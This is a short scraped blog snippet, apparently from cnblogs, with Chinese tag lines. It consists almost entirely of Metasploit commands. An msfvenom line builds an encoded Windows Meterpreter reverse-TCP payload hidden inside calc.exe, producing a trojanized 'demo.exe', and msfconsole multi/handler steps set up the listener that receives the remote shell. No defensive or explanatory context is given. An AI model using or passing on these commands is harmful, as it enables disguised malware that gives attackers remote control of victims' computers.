标签:.exe windows tcp ret console pre demo ons set
#client
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b ‘\x00‘ -x /root/demo/calc.exe -f exe > demo.exe
#server:
msfconsole
msf>
use exploit/multi/handler
set LHOST 192.168.8.106
set LPORT 9999
show options
exploit -z -j
标签:.exe windows tcp ret console pre demo ons set
原文地址:http://www.cnblogs.com/sprinng/p/6534381.html